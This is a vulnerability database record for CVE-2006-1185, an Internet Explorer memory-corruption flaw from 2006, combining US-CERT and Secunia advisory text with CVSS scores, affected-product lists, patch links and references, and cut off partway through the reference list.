* US-CERT Vulnerability Note VU#876678 -
<http://www.kb.cert.org/vuls/id/876678>
* US-CERT Vulnerability Note VU#984473 -
<http://www.kb.cert.org/vuls/id/984473>
* US-CERT Vulnerability Note VU#434641 -
<http://www.kb.cert.org/vuls/id/434641>
* US-CERT Vulnerability Note VU#503124 -
<http://www.kb.cert.org/vuls/id/503124>
* US-CERT Vulnerability Note VU#959049 -
<http://www.kb.cert.org/vuls/id/959049>
* US-CERT Vulnerability Note VU#824324 -
<http://www.kb.cert.org/vuls/id/824324>
* US-CERT Vulnerability Note VU#341028 -
<http://www.kb.cert.org/vuls/id/341028>
* US-CERT Vulnerability Note VU#234812 -
<http://www.kb.cert.org/vuls/id/234812>
* US-CERT Vulnerability Note VU#641460 -
<http://www.kb.cert.org/vuls/id/641460>
* CVE-2006-1359 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359>
* CVE-2006-1245 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245>
* CVE-2006-1388 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388>
* CVE-2006-1185 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185>
* CVE-2006-1186 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186>
* CVE-2006-1188 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188>
* CVE-2006-1189 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189>
* CVE-2006-0003 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003>
* CVE-2006-0012 -
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012>
* Microsoft Update - <https://update.microsoft.com/microsoftupdate>
* Securing Your Web Browser -
<http://www.us-cert.gov/reading_room/securing_browser/#Internet_Explorer>
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA06-101A.html>
Feedback can be directed to US-CERT Technical Staff. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
Revision History
Apr 11, 2006: Initial release
TITLE: Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability
SECUNIA ADVISORY ID: SA15891
VERIFY ADVISORY: http://secunia.com/advisories/15891/
CRITICAL: Highly critical
IMPACT: DoS, System access
WHERE: From remote
SOFTWARE: Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/
DESCRIPTION: SEC Consult has reported a vulnerability in Microsoft Internet Explorer, which potentially can be exploited by malicious people to compromise a user's system. This can be exploited via a malicious web site to cause a memory corruption.
The vulnerability has been reported in versions 5.01, 5.5, and 6.0.
SOLUTION: The vendor recommends setting Internet and Local intranet security zone settings to "High".
PROVIDED AND/OR DISCOVERED BY: sk0L and Martin Eiszner, SEC Consult.
ORIGINAL ADVISORY: Microsoft: http://www.microsoft.com/technet/security/advisory/903144.mspx
SEC Consult: http://www.sec-consult.com/184.html
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0209",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": null,
"scope": null,
"trust": 7.2,
"vendor": "microsoft",
"version": null
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": "6"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 for itanium-based systems"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 x64 edition"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp professional x64 edition"
},
{
"model": "internet explorer sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer for windows nt",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.14.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.198"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.195"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.12000"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.098"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jan P. Monsch jan.monsch@csnc.ch",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1185",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2006-1185",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-17293",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1185",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#876678",
"trust": 0.8,
"value": "35.63"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#680526",
"trust": 0.8,
"value": "28.35"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#984473",
"trust": 0.8,
"value": "23.01"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#641460",
"trust": 0.8,
"value": "27.00"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#341028",
"trust": 0.8,
"value": "32.40"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#503124",
"trust": 0.8,
"value": "29.70"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#434641",
"trust": 0.8,
"value": "25.50"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#740372",
"trust": 0.8,
"value": "10.13"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#939605",
"trust": 0.8,
"value": "44.55"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-144",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-17293",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. This can cause a variety of impacts, such as causing IE to crash. Microsoft Internet Explorer (IE) fails to properly handle HTA files. This vulnerability occurs when the browser parses invalid HTML. \nAttackers can exploit this vulnerability through a malicious web page or HTML email. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n National Cyber Alert System\n\n Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n Original release date: April 11, 2006\n Last revised: --\n Source: US-CERT\n\n\nSystems Affected\n\n * Microsoft Windows\n * Microsoft Internet Explorer\n\n For more complete information, refer to the Microsoft Security\n Bulletin Summary for April 2006. \n\n\nI. Description\n\n Microsoft Security Bulletin Summary for April 2006 addresses\n vulnerabilities in Microsoft Windows and Internet Explorer. \n (CVE-2006-0012)\n\n\nII. If the user is logged on with\n administrative privileges, the attacker could take complete control of\n an affected system. An attacker may also be able to cause a denial of\n service. \n\n\nIII. Solution\n\nApply Updates\n\n Microsoft has provided updates for these vulnerabilities in the\n Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n Please see the US-CERT Vulnerability Notes for workarounds. Many of\n these vulnerabilities can be mitigated by following the instructions\n listed in the Securing Your Web Browser document. \n\nAppendix A. 
References\n\n * Microsoft Security Bulletin Summary for April 2006 -\n \u003chttp://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e\n\n * US-CERT Vulnerability Note VU#876678 -\n \u003chttp://www.kb.cert.org/vuls/id/876678\u003e\n\n * US-CERT Vulnerability Note VU#984473 -\n \u003chttp://www.kb.cert.org/vuls/id/984473\u003e\n\n * US-CERT Vulnerability Note VU#434641 -\n \u003chttp://www.kb.cert.org/vuls/id/434641\u003e\n\n * US-CERT Vulnerability Note VU#503124 -\n \u003chttp://www.kb.cert.org/vuls/id/503124\u003e\n\n * US-CERT Vulnerability Note VU#959049 -\n \u003chttp://www.kb.cert.org/vuls/id/959049\u003e\n\n * US-CERT Vulnerability Note VU#824324 -\n \u003chttp://www.kb.cert.org/vuls/id/824324\u003e\n\n * US-CERT Vulnerability Note VU#341028 -\n \u003chttp://www.kb.cert.org/vuls/id/341028\u003e\n\n * US-CERT Vulnerability Note VU#234812 -\n \u003chttp://www.kb.cert.org/vuls/id/234812\u003e\n\n * US-CERT Vulnerability Note VU#641460 -\n \u003chttp://www.kb.cert.org/vuls/id/641460\u003e\n\n * CVE-2006-1359 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1359\u003e\n\n * CVE-2006-1245 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1245\u003e\n\n * CVE-2006-1388 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1388\u003e\n\n * CVE-2006-1185 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1185\u003e\n\n * CVE-2006-1186 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1186\u003e\n\n * CVE-2006-1188 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188\u003e\n\n * CVE-2006-1189 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1189\u003e\n\n * CVE-2006-0003 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003\u003e\n\n * CVE-2006-0012 -\n \u003chttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0012\u003e\n\n * Microsoft Update - \u003chttps://update.microsoft.com/microsoftupdate\u003e\n\n * Securing Your Web Browser 
-\n \u003chttp://www.us-cert.gov/reading_room/securing_browser/#Internet_Ex\n plorer\u003e\n\n\n ____________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA06-101A.html\u003e\n ____________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n subject. \n ____________________________________________________________________\n\n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n Produced 2006 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n Apr 11, 2006: Initial release\n. 
\n\n----------------------------------------------------------------------\n\nTITLE:\nInternet Explorer \"javaprxy.dll\" Memory Corruption Vulnerability\n\nSECUNIA ADVISORY ID:\nSA15891\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/15891/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\n\nDESCRIPTION:\nSEC Consult has reported a vulnerability in Microsoft Internet\nExplorer, which potentially can be exploited by malicious people to\ncompromise a user\u0027s system. \nThis can be exploited via a malicious web site to cause a memory\ncorruption. \n\nThe vulnerability has been reported in versions 5.01, 5.5, and 6.0. \n\nSOLUTION:\nThe vendor recommends setting Internet and Local intranet security\nzone settings to \"High\". \n\nPROVIDED AND/OR DISCOVERED BY:\nsk0L and Martin Eiszner, SEC Consult. \n\nORIGINAL ADVISORY:\nMicrosoft:\nhttp://www.microsoft.com/technet/security/advisory/903144.mspx\n\nSEC Consult:\nhttp://www.sec-consult.com/184.html\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
},
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
}
],
"trust": 9.36
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-17293",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17293"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#503124",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-1185",
"trust": 2.9
},
{
"db": "BID",
"id": "17450",
"trust": 2.8
},
{
"db": "USCERT",
"id": "TA06-101A",
"trust": 2.6
},
{
"db": "SECUNIA",
"id": "18957",
"trust": 2.5
},
{
"db": "CERT/CC",
"id": "VU#959049",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-1318",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1015900",
"trust": 1.7
},
{
"db": "CERT/CC",
"id": "VU#740372",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#939605",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#680526",
"trust": 1.6
},
{
"db": "CERT/CC",
"id": "VU#234812",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#876678",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#984473",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#641460",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#341028",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#434641",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "15891",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "19583",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "18680",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16373",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19269",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19606",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "19378",
"trust": 0.8
},
{
"db": "BID",
"id": "17181",
"trust": 0.8
},
{
"db": "BID",
"id": "14594",
"trust": 0.8
},
{
"db": "XF",
"id": "21895",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014727",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "16480",
"trust": 0.8
},
{
"db": "XF",
"id": "21193",
"trust": 0.8
},
{
"db": "BID",
"id": "14087",
"trust": 0.8
},
{
"db": "OSVDB",
"id": "17680",
"trust": 0.8
},
{
"db": "SECTRACK",
"id": "1014329",
"trust": 0.8
},
{
"db": "USCERT",
"id": "SA06-101A",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "1838",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-17293",
"trust": 0.1
},
{
"db": "CERT/CC",
"id": "VU#824324",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "45345",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "38386",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#234812"
},
{
"db": "CERT/CC",
"id": "VU#876678"
},
{
"db": "CERT/CC",
"id": "VU#680526"
},
{
"db": "CERT/CC",
"id": "VU#984473"
},
{
"db": "CERT/CC",
"id": "VU#641460"
},
{
"db": "CERT/CC",
"id": "VU#341028"
},
{
"db": "CERT/CC",
"id": "VU#503124"
},
{
"db": "CERT/CC",
"id": "VU#434641"
},
{
"db": "CERT/CC",
"id": "VU#740372"
},
{
"db": "CERT/CC",
"id": "VU#939605"
},
{
"db": "VULHUB",
"id": "VHN-17293"
},
{
"db": "BID",
"id": "17450"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
},
{
"db": "PACKETSTORM",
"id": "45345"
},
{
"db": "PACKETSTORM",
"id": "38386"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-144"
},
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"id": "VAR-200604-0209",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-17293"
}
],
"trust": 0.01
},
"last_update_date": "2024-07-23T19:40:25.577000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"title": "MS06-013",
"trust": 0.8,
"url": "http://www.microsoft.com/japan/technet/security/bulletin/ms06-013.mspx"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-000172"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1185"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.7,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/17450"
},
{
"trust": 2.5,
"url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html"
},
{
"trust": 2.5,
"url": "http://www.kb.cert.org/vuls/id/503124"
},
{
"trust": 1.7,
"url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1677"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1711"
},
{
"trust": 1.7,
"url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a787"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1015900"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/18957"
},
{
"trust": 1.7,
"url": "http://www.vupen.com/english/advisories/2006/1318"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/25542"
},
{
"trust": 1.6,
"url": "http://www.kb.cert.org/vuls/id/959049"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx"
},
{
"trust": 1.6,
"url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx"
},
{
"trust": 1.6,
"url": "about vulnerability notes"
},
{
"trust": 1.6,
"url": "contact us about this vulnerability"
},
{
"trust": 1.6,
"url": "provide a vendor statement"
},
{
"trust": 0.9,
"url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
},
{
"trust": 0.9,
"url": "http://www.sec-consult.com/184.html"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx"
},
{
"trust": 0.8,
"url": "http://secunia.com/advisories/19583/"
},
{
"trust": 0.8,
"url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/917077.mspx"
},
{
"trust": 0.8,
